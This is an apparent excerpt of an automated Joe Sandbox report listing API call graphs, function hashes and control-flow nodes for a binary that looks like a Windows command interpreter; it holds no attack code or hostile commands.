API calls 19158->19159 19159->19153 19161 7ff755cceed1 19160->19161 19162 7ff755cceefd 19160->19162 19286 7ff755ca7420 19161->19286 19300 7ff755cb885c FormatMessageW 19162->19300 19166 7ff755cb01b8 6 API calls 19167 7ff755cceee5 19166->19167 19168 7ff755cceeeb 19167->19168 19169 7ff755cceef8 19167->19169 19172 7ff755cad208 _close 19168->19172 19173 7ff755cad208 _close 19169->19173 19170 7ff755ccef41 LocalFree GetStdHandle GetConsoleMode 19176 7ff755ccefcf SetConsoleMode 19170->19176 19177 7ff755ccefe8 GetStdHandle GetConsoleMode 19170->19177 19171 7ff755ccef04 19171->19170 19174 7ff755ccef2f _wcsupr 19171->19174 19193 7ff755cceef0 19172->19193 19173->19162 19174->19170 19176->19177 19179 7ff755ccf015 SetConsoleMode 19177->19179 19182 7ff755ccf03c 19177->19182 19178 7ff755cb8f80 7 API calls 19180 7ff755cbc879 19178->19180 19179->19182 19180->19062 19180->19063 19181 7ff755ca3240 166 API calls 19181->19182 19182->19181 19183 7ff755cb01b8 6 API calls 19182->19183 19184 7ff755ccf07e GetStdHandle FlushConsoleInputBuffer 19182->19184 19185 7ff755ccf0a0 GetStdHandle 19182->19185 19186 7ff755ccf12d wcschr 19182->19186 19188 7ff755ccf161 19182->19188 19189 7ff755cb3448 166 API calls 19182->19189 19194 7ff755ccf0d7 towupper 19182->19194 19195 7ff755cb3448 166 API calls 19182->19195 19183->19182 19184->19182 19187 7ff755cc8450 367 API calls 19185->19187 19186->19182 19187->19182 19190 7ff755ccf166 SetConsoleMode 19188->19190 19191 7ff755ccf17a 19188->19191 19189->19186 19190->19191 19192 7ff755ccf17f SetConsoleMode 19191->19192 19191->19193 19192->19193 19193->19178 19194->19182 19195->19182 19224 7ff755cc77bc 19196->19224 19197 7ff755cc79ef 19197->19101 19198 7ff755cc7aca 19201 7ff755cb34a0 166 API calls 19198->19201 19199 7ff755cc79c0 19206 7ff755cb34a0 166 API calls 19199->19206 19203 7ff755cc7adb 19201->19203 19202 7ff755cc7ab5 19205 7ff755cb3448 166 API calls 19202->19205 19208 7ff755cc7af0 19203->19208 19212 7ff755cb3448 166 API calls 19203->19212 19204 7ff755cc7984 19204->19199 19210 7ff755cc7989 19204->19210 19205->19197 19211 7ff755cc79d6 19206->19211 19207 7ff755cc7a00 19207->19197 19215 7ff755cc7a0b 19207->19215 19223 7ff755cc7a33 19207->19223 19213 7ff755cc778c 166 API calls 19208->19213 19209 7ff755cb3448 166 API calls 19209->19224 19210->19197 19305 7ff755cc76e0 19210->19305 19214 7ff755cc79e7 19211->19214 19217 7ff755cb3448 166 API calls 19211->19217 19212->19208 19216 7ff755cc7afb 19213->19216 19301 7ff755cc7730 19214->19301 19215->19197 19220 7ff755cb34a0 166 API calls 19215->19220 19216->19210 19221 7ff755cb3448 166 API calls 19216->19221 19217->19214 19219 7ff755cb3448 166 API calls 19219->19197 19225 7ff755cc7a23 19220->19225 19221->19210 19222 7ff755cc778c 166 API calls 19222->19224 19223->19219 19224->19197 19224->19198 19224->19199 19224->19202 19224->19204 19224->19207 19224->19209 19224->19210 19224->19222 19226 7ff755cc778c 166 API calls 19225->19226 19226->19214 19228 7ff755ccc775 19227->19228 19233 7ff755ccc7ab 19227->19233 19229 7ff755cacd90 166 API calls 19228->19229 19231 7ff755ccc781 19229->19231 19230 7ff755ccc8d4 19230->19101 19231->19230 19232 7ff755cab0d8 194 API calls 19231->19232 19232->19230 19233->19230 19233->19231 19234 7ff755cab6b0 170 API calls 19233->19234 19235 7ff755cab038 _dup2 19233->19235 19236 7ff755cad208 _close 19233->19236 19234->19233 19235->19233 19236->19233 19253 7ff755ccd419 19238->19253 19239 7ff755cbcadf 19240 7ff755ccd576 19241 7ff755ccd592 19240->19241 19252 7ff755ccd555 19240->19252 19242 7ff755cb3448 166 API calls 19241->19242 19245 7ff755ccd5a5 19242->19245 19243 7ff755ccd5c4 19247 7ff755cb3448 166 API calls 19243->19247 19248 7ff755ccd5ba 19245->19248 19250 7ff755cb3448 166 API calls 19245->19250 19246 7ff755ccd541 19246->19241 19249 7ff755ccd546 19246->19249 19247->19239 19256 7ff755ccd36c 19248->19256 19249->19243 19249->19252 19250->19248 19263 7ff755ccd31c 19252->19263 19253->19239 19253->19240 19253->19241 19253->19243 19253->19246 19253->19252 19254 7ff755ccd3fc 166 API calls 19253->19254 19255 7ff755cb3448 166 API calls 19253->19255 19254->19253 19255->19253 19257 7ff755ccd381 19256->19257 19258 7ff755ccd3d8 19256->19258 19259 7ff755cb34a0 166 API calls 19257->19259 19262 7ff755ccd390 19259->19262 19260 7ff755cb3448 166 API calls 19260->19262 19261 7ff755cb34a0 166 API calls 19261->19262 19262->19258 19262->19260 19262->19261 19264 7ff755cb3448 166 API calls 19263->19264 19265 7ff755ccd33b 19264->19265 19266 7ff755ccd36c 166 API calls 19265->19266 19267 7ff755ccd343 19266->19267 19268 7ff755ccd3fc 166 API calls 19267->19268 19281 7ff755ccd34e 19268->19281 19269 7ff755ccd5c2 19269->19239 19270 7ff755ccd576 19271 7ff755ccd592 19270->19271 19284 7ff755ccd555 19270->19284 19272 7ff755cb3448 166 API calls 19271->19272 19275 7ff755ccd5a5 19272->19275 19273 7ff755ccd5c4 19277 7ff755cb3448 166 API calls 19273->19277 19274 7ff755ccd31c 166 API calls 19274->19269 19278 7ff755ccd5ba 19275->19278 19282 7ff755cb3448 166 API calls 19275->19282 19276 7ff755ccd541 19276->19271 19279 7ff755ccd546 19276->19279 19277->19269 19283 7ff755ccd36c 166 API calls 19278->19283 19279->19273 19279->19284 19280 7ff755cb3448 166 API calls 19280->19281 19281->19269 19281->19270 19281->19271 19281->19273 19281->19276 19281->19280 19281->19284 19285 7ff755ccd3fc 166 API calls 19281->19285 19282->19278 19283->19269 19284->19274 19285->19281 19287 7ff755ca745f 19286->19287 19288 7ff755ca7468 19286->19288 19287->19288 19289 7ff755ca7497 _wcsicmp 19287->19289 19290 7ff755cc48c8 _wcsicmp 19287->19290 19288->19162 19288->19166 19291 7ff755cb1ea0 8 API calls 19289->19291 19293 7ff755cc48ed CreateFileW 19290->19293 19292 7ff755ca74bd 19291->19292 19292->19293 19294 7ff755ca74c9 CreateFileW 19292->19294 19293->19294 19295 7ff755cc4929 19293->19295 19296 7ff755ca7501 _open_osfhandle 19294->19296 19297 7ff755cc4943 GetLastError 19294->19297 19295->19296 19296->19288 19298 7ff755ca7520 CloseHandle 19296->19298 19297->19288 19298->19288 19300->19171 19304 7ff755cc773c 19301->19304 19302 7ff755cc777d 19302->19197 19303 7ff755cb3448 166 API calls 19303->19304 19304->19302 19304->19303 19306 7ff755cc778c 166 API calls 19305->19306 19307 7ff755cc76fb 19306->19307 19308 7ff755cc771c 19307->19308 19309 7ff755cb3448 166 API calls 19307->19309 19308->19197 19310 7ff755cc7711 19309->19310 19311 7ff755cc778c 166 API calls 19310->19311 19311->19308 19313 7ff755cac486 19312->19313 19314 7ff755cac4c9 19312->19314 19315 7ff755cac48e wcschr 19313->19315 19319 7ff755cac161 19313->19319 19317 7ff755caff70 2 API calls 19314->19317 19314->19319 19316 7ff755cac4ef 19315->19316 19315->19319 19318 7ff755cacd90 166 API calls 19316->19318 19317->19319 19325 7ff755cac4f9 19318->19325 19319->18776 19319->18783 19320 7ff755cac5bd 19321 7ff755cac541 19320->19321 19324 7ff755cab6b0 170 API calls 19320->19324 19321->19319 19323 7ff755caff70 2 API calls 19321->19323 19322 7ff755cad840 178 API calls 19322->19325 19323->19319 19324->19321 19325->19319 19325->19320 19325->19321 19325->19322 19327 7ff755cab018 19326->19327 19327->18814 19328->18814 19330 7ff755cb3bcf 19329->19330 19331 7ff755cb3bfe 19329->19331 19330->19331 19332 7ff755cb3bdc wcschr 19330->19332 19331->18887 19332->19330 19332->19331 19334 7ff755cb2f2a 19333->19334 19335 7ff755cb2f97 19333->19335 19336 7ff755cb823c 10 API calls 19334->19336 19335->19334 19337 7ff755cb2f9c wcschr 19335->19337 19339 7ff755cb2f56 19336->19339 19338 7ff755cb2fb6 wcschr 19337->19338 19340 7ff755cb2f5a 19337->19340 19338->19334 19338->19340 19339->19340 19341 7ff755cb3a0c 2 API calls 19339->19341 19343 7ff755cb8f80 7 API calls 19340->19343 19346 7ff755cbe4ec 19340->19346 19342 7ff755cb2fe0 19341->19342 19342->19340 19344 7ff755cb2fe9 wcsrchr 19342->19344 19345 7ff755cb2f83 19343->19345 19344->19340 19345->18887 19348 7ff755cc4621 19347->19348 19349 7ff755ca72de 19347->19349 19350 7ff755cc47e0 19348->19350 19352 7ff755cc447b longjmp 19348->19352 19357 7ff755cc4639 19348->19357 19358 7ff755cc475e 19348->19358 19351 7ff755ca72eb 19349->19351 19355 7ff755cc4530 19349->19355 19356 7ff755cc4467 19349->19356 19353 7ff755ca7348 168 API calls 19350->19353 19408 7ff755ca7348 19351->19408 19359 7ff755cc4492 19352->19359 19407 7ff755cc4524 19353->19407 19365 7ff755ca7348 168 API calls 19355->19365 19356->19351 19356->19359 19370 7ff755cc4475 19356->19370 19362 7ff755cc4695 19357->19362 19363 7ff755cc463e 19357->19363 19371 7ff755ca7348 168 API calls 19358->19371 19364 7ff755ca7348 168 API calls 19359->19364 19361 7ff755ca7315 19423 7ff755ca73d4 19361->19423 19369 7ff755ca73d4 168 API calls 19362->19369 19363->19352 19373 7ff755cc4654 19363->19373 19377 7ff755cc44a8 19364->19377 19375 7ff755cc4549 19365->19375 19366 7ff755ca72b0 168 API calls 19372 7ff755cc480e 19366->19372 19367 7ff755ca7348 168 API calls 19367->19361 19394 7ff755cc469a 19369->19394 19370->19352 19370->19362 19371->19350 19372->18909 19379 7ff755ca7348 168 API calls 19373->19379 19374 7ff755cc45b2 19376 7ff755ca7348 168 API calls 19374->19376 19375->19374 19378 7ff755cc455e 19375->19378 19393 7ff755ca7348 168 API calls 19375->19393 19382 7ff755cc45c7 19376->19382 19386 7ff755ca7348 168 API calls 19377->19386 19389 7ff755cc44e2 19377->19389 19378->19374 19384 7ff755ca7348 168 API calls 19378->19384 19383 7ff755ca7323 19379->19383 19380 7ff755ca72b0 168 API calls 19388 7ff755cc4738 19380->19388 19381 7ff755cc46e1 19381->19380 19385 7ff755ca7348 168 API calls 19382->19385 19383->18909 19384->19374 19392 7ff755cc45db 19385->19392 19386->19389 19387 7ff755ca72b0 168 API calls 19390 7ff755cc44f1 19387->19390 19391 7ff755ca7348 168 API calls 19388->19391 19389->19387 19396 7ff755ca72b0 168 API calls 19390->19396 19391->19407 19395 7ff755ca7348 168 API calls 19392->19395 19393->19378 19394->19381 19399 7ff755cc46ea 19394->19399 19400 7ff755cc46c7 19394->19400 19397 7ff755cc45ec 19395->19397 19398 7ff755cc4503 19396->19398 19402 7ff755ca7348 168 API calls 19397->19402 19398->19383 19404 7ff755ca7348 168 API calls 19398->19404 19401 7ff755ca7348 168 API calls 19399->19401 19400->19381 19405 7ff755ca7348 168 API calls 19400->19405 19401->19381 19403 7ff755cc4600 19402->19403 19406 7ff755ca7348 168 API calls 19403->19406 19404->19407 19405->19381 19406->19407 19407->19366 19407->19383 19412 7ff755ca735d 19408->19412 19409 7ff755ca3278 166 API calls 19410 7ff755cc4820 longjmp 19409->19410 19411 7ff755cc4838 19410->19411 19413 7ff755ca3278 166 API calls 19411->19413 19412->19409 19412->19411 19412->19412 19422 7ff755ca73ab 19412->19422 19414 7ff755cc4844 longjmp 19413->19414 19415 7ff755cc485a 19414->19415 19416 7ff755ca7348 166 API calls 19415->19416 19417 7ff755cc487b 19416->19417 19418 7ff755ca7348 166 API calls 19417->19418 19419 7ff755cc48ad 19418->19419 19420 7ff755ca7348 166 API calls 19419->19420 19421 7ff755ca72ff 19420->19421 19421->19361 19421->19367 19424 7ff755ca7401 19423->19424 19425 7ff755cc485a 19423->19425 19424->19383 19426 7ff755ca7348 168 API calls 19425->19426 19427 7ff755cc487b 19426->19427 19428 7ff755ca7348 168 API calls 19427->19428 19429 7ff755cc48ad 19428->19429 19430 7ff755ca7348 168 API calls 19429->19430 19431 7ff755cc48be 19430->19431 19431->19383 16763 7ff755cb8d80 16764 7ff755cb8da4 16763->16764 16765 7ff755cb8dbf Sleep 16764->16765 16766 7ff755cb8db6 16764->16766 16765->16764 16767 7ff755cb8ddb _amsg_exit 16766->16767 16773 7ff755cb8de7 16766->16773 16767->16773 16768 7ff755cb8e56 _initterm 16770 7ff755cb8e73 _IsNonwritableInCurrentImage 16768->16770 16769 7ff755cb8e3c 16777 7ff755cb37d8 GetCurrentThreadId OpenThread 16770->16777 16773->16768 16773->16769 16773->16770 16810 7ff755cb04f4 16777->16810 16779 7ff755cb3839 HeapSetInformation RegOpenKeyExW 16780 7ff755cbe9f8 RegQueryValueExW RegCloseKey 16779->16780 16781 7ff755cb388d 16779->16781 16783 7ff755cbea41 GetThreadLocale 16780->16783 16782 7ff755cb5920 VirtualQuery VirtualQuery 16781->16782 16784 7ff755cb38ab GetConsoleOutputCP GetCPInfo 16782->16784 16797 7ff755cb3919 16783->16797 16784->16783 16785 7ff755cb38f1 memset 16784->16785 16785->16797 16786 7ff755cb4d5c 391 API calls 16786->16797 16787 7ff755ca3240 166 API calls 16787->16797 16788 7ff755cbeb27 _setjmp 16788->16797 16789 7ff755cb3948 _setjmp 16789->16797 16790 7ff755cc8530 370 API calls 16790->16797 16791 7ff755cb01b8 6 API calls 16791->16797 16792 7ff755cb4c1c 166 API calls 16792->16797 16793 7ff755cadf60 481 API calls 16793->16797 16794 7ff755cbeb71 _setmode 16794->16797 16795 7ff755cb86f0 182 API calls 16795->16797 16796 7ff755cb0580 12 API calls 16798 7ff755cb398b GetConsoleOutputCP GetCPInfo 16796->16798 16797->16780 16797->16786 16797->16787 16797->16788 16797->16789 16797->16790 16797->16791 16797->16792 16797->16793 16797->16794 16797->16795 16797->16796 16799 7ff755cb58e4 EnterCriticalSection LeaveCriticalSection 16797->16799 16801 7ff755cabe00 647 API calls 16797->16801 16802 7ff755cb58e4 EnterCriticalSection LeaveCriticalSection 16797->16802 16800 7ff755cb04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16798->16800 16799->16797 16800->16797 16801->16797 16803 7ff755cbebbe GetConsoleOutputCP GetCPInfo 16802->16803 16804 7ff755cb04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16803->16804 16805 7ff755cbebe6 16804->16805 16806 7ff755cabe00 647 API calls 16805->16806 16807 7ff755cb0580 12 API calls 16805->16807 16806->16805 16808 7ff755cbebfc GetConsoleOutputCP GetCPInfo 16807->16808 16809 7ff755cb04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16808->16809 16809->16797 16811 7ff755cb0504 16810->16811 16812 7ff755cb051e GetModuleHandleW 16811->16812 16813 7ff755cb054d GetProcAddress 16811->16813 16814 7ff755cb056c SetThreadLocale 16811->16814 16812->16811 16813->16811

                                      Executed Functions

                                      Function 00007FF755CB0A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                      • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                      • API String ID: 3305344409-4288247545
                                      • Opcode ID: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                      • Instruction ID: 6cbda1688d9998ecbbdeea0667299a279aa58d082313e39f66873e59abce8305
                                      • Opcode Fuzzy Hash: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                      • Instruction Fuzzy Hash: D742B6ABA0868385EF50AB1198542B9E7A0EF85FACFCC4234D95E477D5DF7CE9448320
                                      Function 00007FF755CAAA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 216 7ff755caaa54-7ff755caaa98 call 7ff755cacd90 219 7ff755cbbf5a-7ff755cbbf70 call 7ff755cb4c1c call 7ff755caff70 216->219 220 7ff755caaa9e 216->220 221 7ff755caaaa5-7ff755caaaa8 220->221 223 7ff755caacde-7ff755caad00 221->223 224 7ff755caaaae-7ff755caaac8 wcschr 221->224 229 7ff755caad06 223->229 224->223 226 7ff755caaace-7ff755caaae9 towlower 224->226 226->223 228 7ff755caaaef-7ff755caaaf3 226->228 231 7ff755caaaf9-7ff755caaafd 228->231 232 7ff755cbbeb7-7ff755cbbec4 call 7ff755cceaf0 228->232 233 7ff755caad0d-7ff755caad1f 229->233 235 7ff755cbbbcf 231->235 236 7ff755caab03-7ff755caab07 231->236 243 7ff755cbbec6-7ff755cbbed8 call 7ff755ca3240 232->243 244 7ff755cbbf43-7ff755cbbf59 call 7ff755cb4c1c 232->244 237 7ff755caad22-7ff755caad2a call 7ff755cb13e0 233->237 245 7ff755cbbbde 235->245 239 7ff755caab09-7ff755caab0d 236->239 240 7ff755caab7d-7ff755caab81 236->240 237->221 246 7ff755cbbe63 239->246 248 7ff755caab13-7ff755caab17 239->248 240->246 247 7ff755caab87-7ff755caab95 240->247 243->244 261 7ff755cbbeda-7ff755cbbee9 call 7ff755ca3240 243->261 244->219 256 7ff755cbbbea-7ff755cbbbec 245->256 259 7ff755cbbe72-7ff755cbbe88 call 7ff755ca3278 call 7ff755cb4c1c 246->259 252 7ff755caab98-7ff755caaba0 247->252 248->240 253 7ff755caab19-7ff755caab1d 248->253 252->252 257 7ff755caaba2-7ff755caabb3 call 7ff755cacd90 252->257 253->245 258 7ff755caab23-7ff755caab27 253->258 266 7ff755cbbbf8-7ff755cbbc01 256->266 257->219 272 7ff755caabb9-7ff755caabde call 7ff755cb13e0 call 7ff755cb33a8 257->272 258->256 263 7ff755caab2d-7ff755caab31 258->263 281 7ff755cbbe89-7ff755cbbe8c 259->281 276 7ff755cbbef3-7ff755cbbef9 261->276 277 7ff755cbbeeb-7ff755cbbef1 261->277 263->229 268 7ff755caab37-7ff755caab3b 263->268 266->233 268->266 269 7ff755caab41-7ff755caab45 268->269 273 7ff755cbbc06-7ff755cbbc2a call 7ff755cb13e0 269->273 274 7ff755caab4b-7ff755caab4f 269->274 305 7ff755caac75 272->305 306 7ff755caabe4-7ff755caabe7 272->306 298 7ff755cbbc5a-7ff755cbbc61 273->298 299 7ff755cbbc2c-7ff755cbbc4c _wcsnicmp 273->299 279 7ff755caad2f-7ff755caad33 274->279 280 7ff755caab55-7ff755caab78 call 7ff755cb13e0 274->280 276->244 282 7ff755cbbefb-7ff755cbbf0d call 7ff755ca3240 276->282 277->244 277->276 290 7ff755cbbc66-7ff755cbbc8a call 7ff755cb13e0 279->290 291 7ff755caad39-7ff755caad3d 279->291 280->221 286 7ff755cbbe92-7ff755cbbeaa call 7ff755ca3278 call 7ff755cb4c1c 281->286 287 7ff755caacbe 281->287 282->244 312 7ff755cbbf0f-7ff755cbbf21 call 7ff755ca3240 282->312 340 7ff755cbbeab-7ff755cbbeb6 call 7ff755cb4c1c 286->340 295 7ff755caacc0-7ff755caacc7 287->295 319 7ff755cbbcc4-7ff755cbbcdc 290->319 320 7ff755cbbc8c-7ff755cbbcaa _wcsnicmp 290->320 300 7ff755caad43-7ff755caad49 291->300 301 7ff755cbbcde-7ff755cbbd02 call 7ff755cb13e0 291->301 295->295 309 7ff755caacc9-7ff755caacda 295->309 307 7ff755cbbd31-7ff755cbbd4f _wcsnicmp 298->307 299->298 313 7ff755cbbc4e-7ff755cbbc55 299->313 303 7ff755caad4f-7ff755caad68 300->303 304 7ff755cbbd5e-7ff755cbbd65 300->304 329 7ff755cbbd04-7ff755cbbd24 _wcsnicmp 301->329 330 7ff755cbbd2a 301->330 316 7ff755caad6a 303->316 317 7ff755caad6d-7ff755caad70 303->317 304->303 314 7ff755cbbd6b-7ff755cbbd73 304->314 323 7ff755caac77-7ff755caac7f 305->323 306->287 318 7ff755caabed-7ff755caac0b call 7ff755cacd90 * 2 306->318 325 7ff755cbbbc2-7ff755cbbbca 307->325 326 7ff755cbbd55 307->326 309->223 312->244 343 7ff755cbbf23-7ff755cbbf35 call 7ff755ca3240 312->343 315 7ff755cbbbb3-7ff755cbbbb7 313->315 331 7ff755cbbe4a-7ff755cbbe5e 314->331 332 7ff755cbbd79-7ff755cbbd8b iswxdigit 314->332 333 7ff755cbbbba-7ff755cbbbbd call 7ff755cb13e0 315->333 316->317 317->237 318->340 358 7ff755caac11-7ff755caac14 318->358 319->307 320->319 327 7ff755cbbcac-7ff755cbbcbf 320->327 323->287 335 7ff755caac81-7ff755caac85 323->335 325->221 326->304 327->315 329->330 341 7ff755cbbbac 329->341 330->307 331->333 332->331 337 7ff755cbbd91-7ff755cbbda3 iswxdigit 332->337 333->325 342 7ff755caac88-7ff755caac8f 335->342 337->331 345 7ff755cbbda9-7ff755cbbdbb iswxdigit 337->345 340->232 341->315 342->342 347 7ff755caac91-7ff755caac94 342->347 343->244 355 7ff755cbbf37-7ff755cbbf3e call 7ff755ca3240 343->355 345->331 351 7ff755cbbdc1-7ff755cbbdd7 iswdigit 345->351 347->287 349 7ff755caac96-7ff755caacaa wcsrchr 347->349 349->287 354 7ff755caacac-7ff755caacb9 call 7ff755cb1300 349->354 356 7ff755cbbddf-7ff755cbbdeb towlower 351->356 357 7ff755cbbdd9-7ff755cbbddd 351->357 354->287 355->244 361 7ff755cbbdee-7ff755cbbe0f iswdigit 356->361 357->361 358->340 362 7ff755caac1a-7ff755caac33 memset 358->362 363 7ff755cbbe11-7ff755cbbe15 361->363 364 7ff755cbbe17-7ff755cbbe23 towlower 361->364 362->305 365 7ff755caac35-7ff755caac4b wcschr 362->365 366 7ff755cbbe26-7ff755cbbe45 call 7ff755cb13e0 363->366 364->366 365->305 367 7ff755caac4d-7ff755caac54 365->367 366->331 368 7ff755caad72-7ff755caad91 wcschr 367->368 369 7ff755caac5a-7ff755caac6f wcschr 367->369 371 7ff755caaf03-7ff755caaf07 368->371 372 7ff755caad97-7ff755caadac wcschr 368->372 369->305 369->368 371->305 372->371 373 7ff755caadb2-7ff755caadc7 wcschr 372->373 373->371 374 7ff755caadcd-7ff755caade2 wcschr 373->374 374->371 375 7ff755caade8-7ff755caadfd wcschr 374->375 375->371 376 7ff755caae03-7ff755caae18 wcschr 375->376 376->371 377 7ff755caae1e-7ff755caae21 376->377 378 7ff755caae24-7ff755caae27 377->378 378->371 379 7ff755caae2d-7ff755caae40 iswspace 378->379 380 7ff755caae42-7ff755caae49 379->380 381 7ff755caae4b-7ff755caae5e 379->381 380->378 382 7ff755caae66-7ff755caae6d 381->382 382->382 383 7ff755caae6f-7ff755caae77 382->383 383->259 384 7ff755caae7d-7ff755caae97 call 7ff755cb13e0 383->384 387 7ff755caae9a-7ff755caaea4 384->387 388 7ff755caaea6-7ff755caaead 387->388 389 7ff755caaebc-7ff755caaef8 call 7ff755cb0a6c call 7ff755caff70 * 2 387->389 388->389 390 7ff755caaeaf-7ff755caaeba 388->390 389->323 397 7ff755caaefe 389->397 390->387 390->389 397->281
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                      • String ID: :$:$:$:ON$OFF
                                      • API String ID: 972821348-467788257
                                      • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                      • Instruction ID: 6d8c5db5e443c0b85de01439dc228832c7d86a3fdcf941a2386b4f2445fa7f0b
                                      • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                      • Instruction Fuzzy Hash: 3422A1AFA0868386FB54BF219814279EA91EF45F9CFCC8535C90E47795EF7CA840C260
                                      Function 00007FF755CB51EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 398 7ff755cb51ec-7ff755cb5248 call 7ff755cb5508 GetLocaleInfoW 401 7ff755cbef32-7ff755cbef3c 398->401 402 7ff755cb524e-7ff755cb5272 GetLocaleInfoW 398->402 405 7ff755cbef3f-7ff755cbef49 401->405 403 7ff755cb5295-7ff755cb52b9 GetLocaleInfoW 402->403 404 7ff755cb5274-7ff755cb527a 402->404 408 7ff755cb52de-7ff755cb5305 GetLocaleInfoW 403->408 409 7ff755cb52bb-7ff755cb52c3 403->409 406 7ff755cb5280-7ff755cb5286 404->406 407 7ff755cb54f7-7ff755cb54f9 404->407 410 7ff755cbef61-7ff755cbef6c 405->410 411 7ff755cbef4b-7ff755cbef52 405->411 406->407 412 7ff755cb528c-7ff755cb528f 406->412 407->401 415 7ff755cb5321-7ff755cb5343 GetLocaleInfoW 408->415 416 7ff755cb5307-7ff755cb531b 408->416 413 7ff755cbef75-7ff755cbef78 409->413 414 7ff755cb52c9-7ff755cb52d7 409->414 410->413 411->410 417 7ff755cbef54-7ff755cbef5f 411->417 412->403 418 7ff755cbef7a-7ff755cbef7d 413->418 419 7ff755cbef99-7ff755cbefa3 413->419 414->408 420 7ff755cbefaf-7ff755cbefb9 415->420 421 7ff755cb5349-7ff755cb536e GetLocaleInfoW 415->421 416->415 417->405 417->410 418->408 422 7ff755cbef83-7ff755cbef8d 418->422 419->420 423 7ff755cbefbc-7ff755cbefc6 420->423 424 7ff755cbeff2-7ff755cbeffc 421->424 425 7ff755cb5374-7ff755cb5396 GetLocaleInfoW 421->425 422->419 426 7ff755cbefc8-7ff755cbefcf 423->426 427 7ff755cbefde-7ff755cbefe9 423->427 428 7ff755cbefff-7ff755cbf009 424->428 429 7ff755cbf035-7ff755cbf03f 425->429 430 7ff755cb539c-7ff755cb53be GetLocaleInfoW 425->430 426->427 434 7ff755cbefd1-7ff755cbefdc 426->434 427->424 435 7ff755cbf021-7ff755cbf02c 428->435 436 7ff755cbf00b-7ff755cbf012 428->436 433 7ff755cbf042-7ff755cbf04c 429->433 431 7ff755cb53c4-7ff755cb53e6 GetLocaleInfoW 430->431 432 7ff755cbf078-7ff755cbf082 430->432 438 7ff755cbf0bb-7ff755cbf0c5 431->438 439 7ff755cb53ec-7ff755cb540e GetLocaleInfoW 431->439 442 7ff755cbf085-7ff755cbf08f 432->442 440 7ff755cbf064-7ff755cbf06f 433->440 441 7ff755cbf04e-7ff755cbf055 433->441 434->423 434->427 435->429 436->435 437 7ff755cbf014-7ff755cbf01f 436->437 437->428 437->435 443 7ff755cbf0c8-7ff755cbf0d2 438->443 444 7ff755cb5414-7ff755cb5436 GetLocaleInfoW 439->444 445 7ff755cbf0fe-7ff755cbf108 439->445 440->432 441->440 446 7ff755cbf057-7ff755cbf062 441->446 447 7ff755cbf091-7ff755cbf098 442->447 448 7ff755cbf0a7-7ff755cbf0b2 442->448 449 7ff755cbf0d4-7ff755cbf0db 443->449 450 7ff755cbf0ea-7ff755cbf0f5 443->450 451 7ff755cbf141-7ff755cbf14b 444->451 452 7ff755cb543c-7ff755cb545e GetLocaleInfoW 444->452 453 7ff755cbf10b-7ff755cbf115 445->453 446->433 446->440 447->448 454 7ff755cbf09a-7ff755cbf0a5 447->454 448->438 449->450 455 7ff755cbf0dd-7ff755cbf0e8 449->455 450->445 460 7ff755cbf14e-7ff755cbf158 451->460 456 7ff755cbf184-7ff755cbf18b 452->456 457 7ff755cb5464-7ff755cb5486 GetLocaleInfoW 452->457 458 7ff755cbf117-7ff755cbf11e 453->458 459 7ff755cbf12d-7ff755cbf138 453->459 454->442 454->448 455->443 455->450 461 7ff755cbf18e-7ff755cbf198 456->461 462 7ff755cbf1c4-7ff755cbf1ce 457->462 463 7ff755cb548c-7ff755cb54ae GetLocaleInfoW 457->463 458->459 464 7ff755cbf120-7ff755cbf12b 458->464 